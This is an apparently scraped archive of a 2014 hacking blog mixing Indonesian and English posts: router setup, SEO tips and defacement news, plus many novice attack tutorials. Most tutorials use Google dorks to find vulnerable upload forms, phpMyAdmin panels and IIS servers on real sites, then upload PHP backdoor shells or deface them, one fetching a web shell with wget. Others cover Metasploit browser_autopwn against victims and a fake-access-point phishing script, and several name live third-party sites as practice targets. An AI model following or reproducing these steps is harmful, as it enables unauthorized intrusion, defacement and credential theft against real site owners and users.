Senin, 21 April 2014

Get Free Rs10 Recharge [Offer Expired]



Hey friends, Today while surfing the net I got this trick. So I thought to share with you all Guyz. SO here is a working free recharge trick for you all.

Note: This offer is now EXPIRED

Follow the steps below:

1). Give a missed call to 18002000477
2). You will get a coupon code on your mobile.
3). Now go to freecharge.in and select recharge amount of Rs.10
4). Proceed without adding any coupon/offer.
5). Select "Apply freefund / promocode" at the payment step.
6). Add the code you received on your mobile and continue.
7). That's it. Your mobile will be recharged with Rs.10

Note: If you have so many mobile numbers in your home, then give missed calls from all of them and use the received promo code to get your recharge.

Enjoy..!
Read more

Sabtu, 19 April 2014

Cara Membagi Bandwidth Sederhana di Mikrotik

Membagi Bandwidth internet secara sederhana berdasarkan interface menggunakan Mikrotik. Hal ini yang akan kita bahas kali pada artikel ini. Sebelum saya lanjutkan, saya sarankan untuk membaca artikel sebelumnya tentang Cara Membatasi (Limit) Bandwidth Mikrotik dengan Simple Queue Mikrotik.

Oke, langsung saja kita mulai. Jadi kali ini kita akan membuat pembagian bandwidth secara sederhana berdasarkan interface yang digunakan. Untuk lebih jelasnya silakan lihat topologi jaringannya berikut ini :


Bandwidth internet yang saya gunakan adalah seperti berikut ini :


Koneksi Internet dari ISP 3 dengan Bandwidth 4 Mbps (Download) dan 1 Mbps (Upload).
Nah, dari koneksi internet itu, saya akan membagi bandwidth nya menjadi 3 dibagi per interface. Jadi disini saya menggunakan 4 interface ether.
-> interface ether1 : koneksi ke internet (DHCP Client)
-> interface ether2 : koneksi ke client 1
-> interface ether3 : koneksi ke client 2
-> interface ether4 : koneksi ke client 3

Masing-masing interface ether akan dikasih bandwidth
Download : 4 Mb/3 = 1333 Kb
Upload : 1 Mb/3 = 333 Kb

Oke, kita mulai langkah-langkah Cara Membagi Bandwidth Sederhana di Mikrotik :
1. Pastikan Mikrotik anda sudah bisa terhubung ke Internet (Seting DHCP Client, DNS, Firewall Masquerde, IP Address, dll).

2. Seting IP address untuk masing-masing interce yang tehubung ke client :
--> ether2 : 10.10.10.1/24
--> ether3 : 10.10.20.1/24
--> ether4 : 10.10.30.1/24


3. Buat DHCP Server untuk masing-masing client, masuk menu IP --> DHCP Server --> DHCP Setup
(Jika anda ingin konfigurasi IP client secara manual point ini bisa dilewati)


4. Untuk Membagi Bandwidth, masuk ke menu Queues --> Simple Queues --> Buat rule baru

[Tab General]
--> Beri nama rule nya
--> Target : ether2 atau 10.10.10.0/24
--> Max limit :
---> Target Upload : 333k
---> Target Download : 1333k


[Tab Advanced]
--> Limit At :
---> Target Upload : 333k
---> Target Download : 1333k
Untuk membuat rule pada interface selanjutnya, tinggal klik saja tombol Copy terus ganti nama dan target nya supaya lebih cepat.


 5. Kalo setingan sudah beres, sekarang kita coba tes dengan melakukan Bandwidth test pada Client, dan hasilnya adalah sebagai berikut :

Hasilnya hampir sama seperti yang sudah kita seting sebelumnya yakni :
Bandwidth 1190 Kb (Download) dan 333 Kb (Upload)

Sekarang pertanyaan nya, kenapa pembagian nya dibuat per interface? Karena itu adalah permintaan klien saya :D. Waktu saya di Makassar, saya diminta oleh Polda Sulsel untuk membagi bandwidth internet menjadi tiga menggunakan Mikrotik RB750. Masing-masing dibuat sama rata per interface karena mau digunakan untuk koneksi Video Conference dengan Mabes Polri. Sekalian saya bantu seting juga video conference nya. Sedikit curhat boleh ya :D

Oke, sekian saja tutorial Cara Membagi Bandwidth Sederhana di Mikrotik. Semoga bermanfaat :)
Read more

Bihar Bharti Janta Party Official Website Hacked

Bihar Bharti Janta Party official website was defaced and Server was rooted by Pakistan Hackers and leaving a message on the website followed by the slogan “Pakistan Zindabad“.

#OP Modi was recently started by Pakistani Hackers targeting Modi’s related online websites.



Though the website gets restored, still the deface page or the content on that page can be read by going through the Mirror link.

 BJP Websites are being the frequent targets of Pakistani Hackers




Read more

Simple Upload 53 Shell Upload Vulnerability

This Vulnerability allows Hacker to upload Shell. Web Application vulnerability in"Simple Upload 53" PHP file allows an attacker to upload Backdoor shell code in your website.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Paste the below dork in the google and click search.
inurl:simple-upload-53.php
2). After you search in Google you will find many Websites containing Simple-Upload-53.php at the end of url. Now simply open any of them.



3). Now you can see the upload option in the site. Here is the vulnerability, it allows you to upload files.
You can upload Backdoor shell as ".php.jpg" or ".php.gif" etc.

4). The uploaded shell will be in this place:
http://www.site.com/files/[Your File]
After uploading the shell , You can hack/deface the site.
Read more

WebTester File Upload Vulnerability



Hello Reader,Hope you all are enjoying my posts.. here Im back with new file upload vulnerability..
called WebTester File Upload Vulnerability . SO lets start..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). GO to google and type the following dork..
Google Dork : inurl:go.php?testID= 
For More Results Use your Brain and create your own Dork..
Exploit :http://[target]/[path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
2). Now, upload your html , txt or jpg files



3). To find you uploaded file :-
 http://target/path/test-images/[yourfile].html
Enjoy...
Read more

Hack Web Sites Using IIS Exploit [For XP Users]


Hello Readers, I heard some of you are not getting out tutorials because u have no knowledge about Web hacking and you wanna learn web hacking .. So today i decided to write this tutorial for no0bs.

Because in this tutorial we are going to learn about IIS Web Hacking Exploit the Easiest way to hack for Noobs..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

By using this Exploit an attacker can upload shell , Deface web site delete data etc. etc can do every thing without login..:D . Yeah you heard Right.. I know you all are getting exited, So lets's start :-

Note:- this is only for Windows XP users. For Windows 7 user , i will post soon ...

Follow the Instructions:-

1). First Of all we need to find Vulnerable site. Go to google and type the following dork:-

Dork- Intext:"Powered by IIS

Actually there is no particular dork be Creative use mind and create your own unique dork :) ..

If you are unable to find Don't worry ..See the end of the tutorial i have posted some sites :)

2). After Finding Vuln Site .Click on Start button And open "RUN"


3). Now type the following code in "RUN"
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

4). Now a FOlder will open named "Web Folders"

Now Right Click in that folder then "New" And then  "Web Folder"..


5). Now paste the url of the Vulnerable site And CLick Next..


6). Now it will ask you to give Name for that Web Folder leave as it is Click Finish..


7). Congratulations! Now you are in the web site..If you wanna upload shell copy your Shell.php in to that folder and your shell will be uploded.. to path

Example : site.com/shell.php

Do the same to upload your deface also :D

Here are some site For Practicing ....  
http://www.houtai123.cn/
http://news.rhvacnet.com/
http://israelshamir.net/
http://intellectual.members.easyspace.com/
http://hoodstarsports.com/
http://jennylo.co.uk/
http://hurrelvisualarts.com/

Soon i will post list of Vuln. sites of IIS Exploit/....
Read more

Jumat, 18 April 2014

Reset Samsung Mobile Tracker Code



These Code Reset All Code In Your Samsung Mobile(Any Model)

Samsung Tracker Code Also Reset By These Codes:-
If You Forget Your Code Don't Worry

>> Turn Off Your Mobile
>> Remove The SIM
>> Turn On Your Mobile Without SIM
>> Enter The Code *2767*637# (Universal Unlock Code)(Reset Mobile Tracker Code)
>> Enter The Code *2767*3855#(Full EEPROM Reset)(Reset All Type Of Code)
Read more

Kamis, 17 April 2014

Make free Mobile calls And Fake Call for India, US and Canada with Dingaling


Hey Guyz !..Calling to other number using any number is also called as call spoofing but its not possible in all countries . Here we are going to show you one newly launched App which allows you to call other number using any number and also gives you free minutes to call :D. This App is called DINGALING

What is DINGALING ?
DINGALING is the free calling app for Android or IOS devices and it got web interface also that means if you don't have Android or IOS device then also you can use these amazing features. It has the ability to make free calls to your friends mobile or landline numbers that means your friend need not have the app installed in his smartphone, just enter the phone number in dial pad of app and hit on free call.

Each call have a minimum duration Of:
-10 mins for India 
-30 mins for countries like US, Canada & China.

There are 2 ways in which you can use this service:-

1). Via Web : If you want to call any number using any number(FAKE CALL) then just register to web interface by clicking Here . After successful registration, just login and enjoy free call from Start new call section by putting From and To Numbers.



2).  Via App To App or App To Other Numbers : If you have a Android app then you can use this application freely. You can call any number from your smartphone using this superb app. Main features of this app is that receiver will receive call from same registered number which you registered in dingaling, that means no one can caught you that you are calling him using any third party app.

Note:-

1). You can only use calling to any number using any number by using Web.

2). Upto 10 mins calling allow to Indian numbers and upto 30 mins allowed for US, Canada & China numbers.

3). You can send free sms only to Dingaling app users.

4). Dingaling will show the number that you used during registration .

Hope you like this ..Please leave your Valuable comments and visit again :)
Soure: OMGTricks
Read more

Rabu, 16 April 2014

#OpSriLanka: Hackers from around the world launches Cyber war against Sri Lanka

In protest of attacks taking place on Srilankan Tamils, Hackers hit Srilanka with cyber attack that resulted in defaced of some sites, as well as database being leaked.



"Shawdowforce" who conduct the Operation report that representative from more than 13 teams including Anon Ghost -Indian Haxors Team - Indian Cyber Rakshak - RedCult (Lebanon) - Muslim Cyber Corporation(Indonesia) - Pakistan Haxors Crew - Ip Sova Crew(Malaysia) - Indonesian Red Code -Team - Elite Cyber Army (Philippines) - Afghan Cyber Army - Indian Cyber Devils - Sec~Team-7 - Sec_dark participated in the operation.



Several Government websites were defaced and others were brought down using DDOS. More than 100 websites including websites of  government, big Organisations and local business were defaced too.



This is a part of the joint event that we are conducting #OpSrilanka (April 15-16).  

We will Speak against your government's AirStrike on the "NO FIRE ZONE" !  

We will Speak against the attrocities committed by Srilankan Army on innocent Tamil population !  
We will Speak against the War Crimes committed by your government!  
We will Speak against the Genocide committed by Your Government ! 
stop this !!!!! 
Deface message shows.
afcan-cyber-army-opsrilanka-deface-page


anonghost-opsrilanka-deface-page


indian-cyber-evils-opsrilanka-deface-page

Paste Released by Afghan Cyber Army CLICK HERE
Screenshots showing websites were down during the Operation,
A paste released by the organisers of the Operation:-



At the time of writing the post most of the websites were restored and working back to normal.

Source:- thehackerspoint.com
Read more

Selasa, 15 April 2014

Adobe Reader App for Android Vulnerable to Remote Code Execution



Security on the Android device is getting more high as the new and latest vulnerabilities are addressed. Again one popular app of Android "Adobe Reader" is found to be vulnerable. About 400 million android users have installed Adobe reader on their device. If you are among these, then you must update your Adobe Reader from Google Play store.



Adobe has just released the latest version of Adobe reader after fixing the Remote Code Execution on its previous version. Adobe have published the report for the vulnerability code (CVE-2014-0514) resides in the implementation of JavaScript APIs on Adobe Reader 11.2 that could be exploited to execute arbitrary code within Adobe Reader.

A security researcher Yorick Koster from Securify BV, have noted the vulnerability to Adobe. Explaining the vulnerability, Koster claims that attacker can craft a PDF file with malicious java script that can exploit the victim when he/she open it in affected version of the Adobe Reader.

Successful exploitation allows the attacker, to access the files stored on the Micro SD card and also can read the other personal information present on the device. So it is recommended to update your Adobe Reader from Google Play store.
Read more

Portail Dokeos deface and Shell Upload vulnerability

Portail Dokeos Vulnerability is a Kind of FCK Editor Remote file upload Vulnerability..
In this Vulnerability Hacker can upload a shell. deface page or any file on website without admin username and password...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and enter the following dork
Google Dork :"Portail Dokeos 1.8.5"
2). Open any site and change the url after site.com to the Exploitable target..For Example:-

Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

3). Now change ASP into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here..



To view your uploaded file go here : http://website/patch/main/upload/your file here 

Live Demo:-
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ecampus.webinfo-concept.fr/main//inc/lib/fckeditor/editor/filemanager/upload/test.html

Read more

Encodable Shell File upload Vulnerablity

Yeah read it :) :P

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Open google.com and Enter the following dork
Dork: "intext:File Upload by Encodable"
Result comes with 166,000 results.. but some results are fake ... its may be malwares
So pick real things only , "Upload a file" You will this title in search results here :)
Click the sites only which comes with upload a file title..


2). After click the link you'll got a upload form...


3). You'll see some options in this form like name Description email etc ...
type anything in these boxes but add a email in email box, dont use your own
put this one billy@microsoft.com , admin@nasa.gov etc :P

4). Now choose you file and upload it :)

5). After clicking on upload button a pop up will be open ... dont close it, it will automatically closed
after uploading file.

6). In some sites you'll get your uploaded file link after uploading on website
and if you did not file it then try these url
/upload/files/
or /upload/userfiles/

Live Demo : http://www.bellblue.com/cgi-bin/filechucker.cgi

Read more

How to avoid becoming a victim of keyloggers


Know how it works:
Knowing how it works will help you make a better decision. A keylogger is a little piece of software that normally stays hidden in your system and collects information on the keys you press on your keyboard. This coupled with its ability to match these keystrokes with the application for which they are being pressed, make a keylogger an extremely dangerous hacking tool. As normally it resides in a system hidden, it can steal your information without you even noticing anything.

Use good quality anti-keylogger software:
Anti-virus anti-malware software are a requirement for every user. But they may not be able to detect and remove keylogger software. For this, you should use specific anti-keylogger software. In fact, according to a report almost all anti-virus software failed to detect a keylogger in a controlled lab test. Only a specifically tailored anti-keylogger can make sure that your information stays safe and secure.

Use secure communication channels:
As important and useful the worldwide web is, it is as much dangerous because of some people who use it for their nefarious designs. Some steal your information while others just like to bog down a system with excessive virus attacks. Make sure that you are using only secure websites for your communication, like emails, instant messaging and video calls etc. It is these unprotected sites that can spread these keylogger software easily. Avoid them at all costs for your communication needs.

Be on alert:
The best possible way to protect your computer and your information is to be on alert. It is almost always when you do not take care and follow security precautions that you fall victim to these tricks and get your system infected with viruses. Putting your information at risk is not a good idea. But thinking that anti-virus software, or anti-keylogger software for that matter, will keep your system 100% secure is a mistake. If you are not on your guard, anyone can access your system physically and compromise your security wall, thus eliminating the need of tackling anti-virus over the internet. You also need to know which sites you are visiting and whether there is any Google or other security software advisory on that site. You should also avoid clicking on suspicious links, particularly those appearing in your email, asking for your private information.

Stay updated:
You should also make sure that your system is updated with the latest system and anti-virus software security patches. This will ensure that your system is protected and can withstand attacks over the internet. In any case, you are the one who needs to be on guard more than your system.
Read more

Senin, 14 April 2014

How to Increase Traffic and Page Views in Blogger?

Decent amount of traffic to a blog is the dream of every blogger. All hard working and work addicted bloggers do a lot of things to gain massive amount of traffic to their blog because without it, we are not able to success in our blogging career. Here at Hackers Store, I have shared a lot of tips and tricks to increase blog traffic and page views. Today, I’ll provide the compilation of all those methods and ideas so that you can learn about the strategies that work awesomely to maximize the traffic to a blog.

I have divided this post into two sections of Tips and Tricks that really works to increase traffic to blog. Doing so will help you to understand what tips and tricks we can apply to our blog to increase its popularity. Let first start with the tips which are necessary for every blog in any niche.

Tips to Increase Blog Traffic:-

When you first create a blog on blogger, then definitely you search on Google that how to increase traffic to blogger. And this is the most common question asked by newbie bloggers. That's why I published a post so that they can also know the ways that can help them to improve traffic to their blog. I have short listed all those working tips in below post. 

1). Fast Loading Template:-
You must need to make your blog looks professional. Always try to make your blog's look nifty. Visitors first look at the blog design and if they don't like the design then they will never come back. Try to get a fast loading template for your blog. Visitors love to read fast loading blogs.

2). Use Share Buttons:-
Social share buttons really works to get new visitors to your blog. If your readers like your post content then surely they will share it with their friends. This will invite new readers to your blog to read the story. Beside this share buttons also help to increase your blog backlinks and search engines loves these backlinks. It will help your posts to rank in search engines and your traffic will increase.

3). Keyword Research:-
Keyword research is an interesting and enjoyable task. Before publishing any article always do some research on your keywords you are going to use into your post. Choose best keywords for your posts to target the audience. Always use Long Term Keywords (Long Tail Keywords) because they are easy to rank as compare to short term keywords. Google also show accurate result while somebody search for any information if the user query contains more than 5 words. 

4). Blog Commenting:-
This is what I like most to increase blog traffic. Make it your habit to post comments on other popular blogs of same niche regularly. It is the best way to increase your blog readers. If possible then try to leave the first comment with link back to your sites. Because readers also read comments and first comment attract the readers and if your comment is interesting for readers then they will surely click on your link to know about your blog. It will increase your blog readership and hence more traffic to your blog.
Note: Don't put spam comments. First read the post and then leave a valuable comment that add some value to the conversation. Don't comment like 'nice post', 'helpful article' etc. These types of comments not attract the readers.

5). Reply to Comments:-
Reply to your reader's comments. Solve their queries and doubt about the topic you are posting. It will help you to build better relationships with your blog visitors. They will like to visit your blog again and again to get something new. Returning visitors are really important for success of a blog.

Tips to Increase Blog Page Views:-

As same as blog traffic, increasing blog page views is also important. If you are not able to make your blog sticky for your readers then they will leave your blog without reading more posts. For a successful blog, page views are most important to increase. If you are thinking that how we can increase page views of our blog, then there is no need to worry. When you read below post then you will be amazed how easy that is. Don't miss to read it.

1). Show Related Posts:-
Whenever you write new post for your blog, always remember to tag it with a keyword rich label before publishing it. Then use related posts widget to show similar posts under that label below every post. It will not only increase your blog page views but also reduce your blog bounce rate.

2). Highlight Popular Posts:-
Put popular posts widget into blog sidebar to show most trendy posts of your blog. By doing so, you provide one more option to the visitors to click the link. Once they attract towards the popular posts they will surely keen to read them. Hence more blog page views that automatically increase your blog traffic.

3). Deep Linking:-
You may already know the benefits of internal linking and deep linking is same as internal linking but it has some more benefits then it. Suppose you have two posts in your blog Post A and Post B then you can interlink Post A with Post B. But in case of deep linking you need to link Post A with that post which is same with that topic means which covers topic of Post A in depth.

4). Split Lengthy Posts:-
Generating quality content for blog is must for success. You should make a plan to publish at least a post with details and well explanation in a week. For ex: 20 Tips to Increase Blog Traffic. Once you write a lengthy and detailed post, the tricky part comes in action. 

5). Use Search Box:-
If your readers finish reading the article and want more relevant information and don’t get it then surely they will go back to another blog for more information. To resolve this issue always add a search box in your blog like Google Custom Search Box. This is the best widget that shows more relevant posts than other search boxes.

Source : Internet
Read more

Top 10 latest SEO techniques for Webmasters



The success or failure of any site greatly depends upon the ranking of search engine that shows the results of your website. If your rank is very below like at 3 or 4 page, the visitors don’t have enough time to wait and watch every site on the web. They simply click among the sites that are posted on first page. Now, in order to increase your visitors your site must be among top sites for which you have to follow some SEO tips which are mentioned below. However getting a website on the top of the ranking takes a little time, but it's not something out of the box. Quality content is the key to reach at the top of the rankings using the latest search engine optimization techniques.


1). Create a Meta tag data for your Site..
A page title is the very first thing which a search engine looks at because it describes the mission statement of your website that what your website is about. It is also the first thing potential visitors will see when looking at your search engine listing.

It’s important to include one or two attractive and attention seeking keywords in the title tag — but don’t go overboard. You can also include your websites name and location in your title page.

2). Unique titles increase the probability of visitors ..  
Since titles are like the headings which are the first and most visible thing a visitor might see on your website. Therefore, before reading the inner crispy and crunchy content if the reader fails to appreciate your title then rich content is of no use. Therefore choose unique and engaging titles in order to maintain the attention of readers till the last word of your site. 

3). Make attractive keywords..
Before creating your keyword list, you’ll want to think of the specific terms people will type in when searching for a site like yours. Always include simple and relevant keywords related to the topic of your website. For example if your website is about textile do include the word threads and clothes but be stick to a brief list of keywords don’t include too many synonyms because it may increase the readers but they'll be short run reader you won't be able to catch them for a longer time.

4). Heading tags catches attention of readers easily..
Since, headings are the first thing which gains attention of the reader. Therefore make attractive, engaging and easy to relate headings. This is a very important element to consider when writing out your site copy. Use of heading tags helps users, web browsers and search engines alike know where the major key points of your copy are.

5). Use of ALT and TITLE tags to the images are a plus point...
The use of alt on images is useful from two points of views; first In SEO, putting a brief yet attention gaining alt attribute along with your image gives additional relevant text to your source code that the search engines can see when ranking your site. Secondly, the more relevant text on your page the better chance you have of achieving higher search engine rankings.

6). Promote your site through social media...
Since, Facebook and twitter have made virtual communities over internet and people spend most of the time surfing on these sites. Creating a page on Facebook is one of the leading trends emerging to market your brand. Also by giving the link of your site on Facebook can actually increase your viewers by a high percentage. And Facebook, Twitter, Google+, Pinterest & LinkedIn are those places from where you can get tons of free traffic. And they are crawled by search engines as well like Google.

7). Write clean content...
Always write clean, clear and legal content. Don’t use abusive language and don’t plagiarize the content. If you are copying content from any website, Always acknowledge it. This will for sure places your website among top priorities.

8). Give Brief description of each heading...
Before creating your own web site, remember it always write simply, explaining whatever information you’re discussing is relevant to your main topic and Meta title. The key is to make it sense to the reader. Even if you trick the search engines by increasing your rating and making your site listed on the first page. Remember you can't trick the reader who after clicking your site and taking no inputs from it rather than irrelevant content can switch to other site in a matter of seconds. 

9). Create Natural link profile...
With the use of natural and genuine content, you’ll be able to generate links with other web sites and blogs, as well. It’s kind of give and take scenario, that if you link out to other sites, you’ll find sites linking back to you  and this is how your page rank can go up as well.

10). Localize your content...

Always give proper name, address and relevant map of your website so that the reader can trace if you are making a brand or product related website

We hope you'll find the above tips useful when optimizing your websites/blogs. And also give us some feedback about your Search Engine Strategies in comment section.
Read more

Hack Remote Windows 7 | XP PC With Metasploit (Browser Auto Pwn Vulnerability)

Hi all this is one of the popular attack know as browser auto pwn Vulnerability which we are going to use in this tutorial.

This is a simple vulnerability that allow attacker to hack to remote machine just by a single click by the victim.
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

-::Using Metasploit::-

In Metasploit there is a module known as browser autopwn. The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits. When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.

Follow these steps to carry out the attack :-

1). Open you backtrack/kali terminal make sure metasploit is there (which is present by default :D ).

2). Type #msfconsole on terminal



3). Now follow these steps as show in image

4). Use the browser_autopwn module

use browser auto pwn


5).We have set up the LHOST with our IP address,the port to be 4445 and the URIPATH with / in order to prevent metasploit to set up random URL’s.now you will see below image.

server started with 16 module
Server started with 16 module.

6). Next we need to send the link to victim (like here http://192.168.205.131:8080/).as soon as the victim open the link its all done.

We have the meterpreter shell control in out hand you can do various activity you wish with meterpreter shell functionality.


Enjoy the hack of your victim machine have fun .!!!!

Read more

PwnSTAR: Pwn Soft Ap Script For Hacking

It is basically a bash script to launch a Fake AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing and phishing.Can act as multi-client captive portal using php and iptables.

Launches classic exploits such as evil-PDF.An easy way to launch the "best" metasploit modules eg CVE-2013-0422 De-auth with aireplay, airdrop-ng or MDK3.

Few Top features:-
1). Takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server
2). Steals WPA handshakes
3). Phishes email credentials
4). Serves webpages: supplied (eg hotspot, below) or provide your own
5). Sniffing with ferret and sslstrip
6). Adds a captive portal to the frontend of the fake AP
7). Assorted exploits
8). De-auth with MDK3, aireplay-ng or airdrop-ng
9). Use your imagination, craft your own webpages, and have fun.

Download Package contents:
-"Hotspot_3" is a simple phishing web page, used with basic menu option 4.
-"Portal_simple" is a captive portal which allows you to edit the index.html with the name of the portal
                    Example:- "Joe's CyberCafe". It is used for Sniffing.
-"Portal_hotspot3" phishes credentials, and then allows clients through the portal to the internet.
-"Portal_pdf" forces the client to download a malicious pdf in order to pass through the portal.
-Designed for Kali-linux and BackTrack5 ,Current version for Kali is PwnSTAR_0.9.

PwnSTAR.tgz is a bundle containing the current version of the script + all required webpages.

Download:-
Installation process:-

1). It is simple to install and use. download from above link and then follow the screenshot.


2). And Main menu is this-->


Keep checking Hackers-Store for upcoming tutorial on PwnSTAR.
Read more

Minggu, 13 April 2014

Upload Shell And Deface Via PhpmyAdmin

Earlier I have posted About How to get Acess to PhpmyAdmin without login through google dorks. As i promised I will post about how to deface using PhpmyAdmin. So here it is Lets start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 
- pma & mysql db privileges. 

Follow the Instructions:-
1). First login in to mysql. Or you can use these dorks also CLICK HERE.



2). Now click 'Show MySQL system varible" then 'SQL' . Now you can run sql commands,like create db, delete tables or whatever. We want to upload shell so lets move on to it. 



3). Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. 

4). Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. Thats all then we av the shell on the site!!..!


Read more

Sabtu, 12 April 2014

PhpmyAdmin Exploit with Google Dorks




Hello Reader! Today Im going to show you how to exploit PHPmyAdmin with google Dorks. You dont nedd to do any thing no login nothing just put the dork and open any site you will directly go to PHPmyAdmin :).. So let's Start...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-
1). Enter the following Dork in Google.
Dork: allinurl:index.php?db=information_schema
2). It will show you about 80,800 Results. So now you can guess how many Vuln  sites are there :D..Open any site you will redirect to PHPmyAdmin...:D

This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data

Learn To Deface VIA PhpmyAdmin:-
How to deface using PHPmyAdmin..

Hope you all are enjoying my blog posts...If you like our tutorials please leave valuable comments ...
Read more

Android Devices Are Vulnerable To Heartbleed Bug


Many Android Devices Are Vulnerable To Heartbleed Bug. Google recently reported that Android OS are vulnerable to Heartbleed Bug.

According to Google online security blog,
"We’ve assessed this vulnerability and applied patches to key Google services such as Search, Gmail, YouTube, Wallet, Play, Apps, and App Engine.  Google Chrome and Chrome OS are not affected. We are still working to patch some other Google services. We regularly and proactively look for vulnerabilities like this -- and encourage others to report them -- so that that we can fix software flaws before they are exploited.

If you are a Google Cloud Platform or Google Search Appliance customer, or don’t use the latest version of Android, here is what you need to know.

Cloud SQL
We are currently patching Cloud SQL, with the patch rolling out to all instances today and tomorrow. In the meantime, users should use the IP whitelisting function to ensure that only known hosts can access their instances.

Android
All versions of Android are immune to CVE-2014-0160 (with the limited exception of Android 4.1.1; patching information for Android 4.1.1 is being distributed to Android partners.
"

What is Heartbleed Bug?
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.

The Heartbleed vulnerability exposed this week. Bug effected OpenSSL versions released in past two years. In vulnerable system, hackers can collect all encrypted data from a website's server before its deleted can say Zero day vulnerability.

According to report WSJ, Donations have picked up since Monday. This week, it had raised $841.70 as of Wednesday afternoon.

Check your server for Heartbleed Bug causing.
http://filippo.io/Heartbleed/
Enter a URL or a hostname to test the server for CVE-2014-0160

What is the CVE-2014-0160?
CVE-2014-0160 is the official reference to this bug. CVE (Common Vulnerabilities and Exposures) is the Standard for Information Security Vulnerability. 


Security Notice:
Some are websites also affected by Heartbleed Bug. You should change the passwords of your Email and Social Network accounts now. Mashable noticed Heartbleed hit list website affected.

Read more

Hack Website using Android Phone - Droidsqli



Hello Guys, today we talk about how to hacked a website using your Android phone.We know that in the world 70% website hacked by using SQL injection. For automate SQL injection We need tool or OS - back track, havij or Kali, and etc..But now you can attack on site using your android mobile phone and Tables and hack website using a Android App called Droidsqli.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Only you need 3 things:-
1). SQL Vulnerable site:- Learn to find Vuln sites
2). android mobile
3). Droidsqli tool:- Download Here

What is DroidSQLi?
DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.


Download(MediaFire):-
Password:- hackers-store.blogspot.com


How to use it?
Itz pretty simple actually coz all the process are done automated here.
All you need to do is find a vulnerable url and put it on Target URL and touch Inject
You will be getting data base and all server info .

DroidSQLi supports the following injection techniques:

  • Time based injection
  • Blind injection
  • Error based injection
  • Normal injection
It automatically selects the best technique to use and employs some simple filter evasion methods..! :)


Know more about SqlInjection ..
I am sure you will enjoy using this tool have fun and thanks again.
Read more